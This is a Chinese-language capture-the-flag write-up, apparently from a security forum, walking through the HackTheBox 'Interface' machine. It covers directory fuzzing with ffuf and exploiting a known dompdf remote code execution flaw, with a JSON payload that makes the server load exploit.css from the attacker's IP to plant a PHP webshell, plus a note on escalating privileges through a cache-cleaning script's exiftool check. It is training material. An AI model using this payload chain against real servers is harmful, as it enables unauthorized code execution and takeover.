-
-
[原创]HTB Interface(MEDIUM)
-
发表于: 2023-2-26 19:07
-
扫端口还是只开了22和80
可以看到有个子域名
直接访问会显示File not found
扫一下目录
有vendor和api两个文件夹
再扫一下
扫出了html2pdf composer dompdf信息,可以在GitHub上找到该工具
https://github.com/dompdf/dompdf
Dompdf is an HTML to PDF converter,这是个将html转pdf的工具
搜索过后可以找到相关的漏洞https://github.com/positive-security/dompdf-rce
$dompdf->loadHtml($html);
$dompdf->setPaper('A4', 'landscape');
$dompdf->render();
在这个漏洞中我们可以通过json发送数据来加载css并加载 payload
利用该exp拿webshell
修改exploit.css文件内容,将localhost改为本机ip
再修改php里的
抓包/api/html2pdf post css文件
php加载phpurl的名称 explorefontnormal和md5
payload的文件路径是在http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_xxx.php
拿到user flag
在/tmp目录下运行pspy
/bin/bash /usr/local/sbin/cleancache.sh
看一下cleancache.sh
脚本交换替代tmp里的文件并验证,然后使用exiftool工具从所有文件中提取meta_producer,如果与dompdf的内容不同则删除文件
可以利用meta_producer字段
curl 10.10.11.200 -I
curl 10.10.11.200 -I
echo 10.10.11.200 prd.m.rendering-api.interface.htb | sudo tee -a /etc/hosts
echo 10.10.11.200 prd.m.rendering-api.interface.htb | sudo tee -a /etc/hosts
fuf -w wordlist/SecLists-master/Discovery/Web-Content/common.txt -u http://prd.m.rendering-api.interface.htb/FUZZ -mc all -fs 0
fuf -w wordlist/SecLists-master/Discovery/Web-Content/common.txt -u http://prd.m.rendering-api.interface.htb/FUZZ -mc all -fs 0
ffuf -w wordlist/SecLists-master/Discovery/Web-Content/big.txt -u http://prd.m.rendering-api.interface.htb/vendor/FUZZ -mc all -fs 0 -X POST
ffuf -w wordlist/SecLists-master/Discovery/Web-Content/big.txt -u http://prd.m.rendering-api.interface.htb/vendor/FUZZ -mc all -fs 0 -X POST
{ "html": "<link rel=stylesheet href='http://10.10.**.**/exploit.css'>"
}{ "html": "<link rel=stylesheet href='http://10.10.**.**/exploit.css'>"
}echo -n 'http://10.10.16.10/exploit_font.php' | md5sum
echo -n 'http://10.10.16.10/exploit_font.php' | md5sum
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
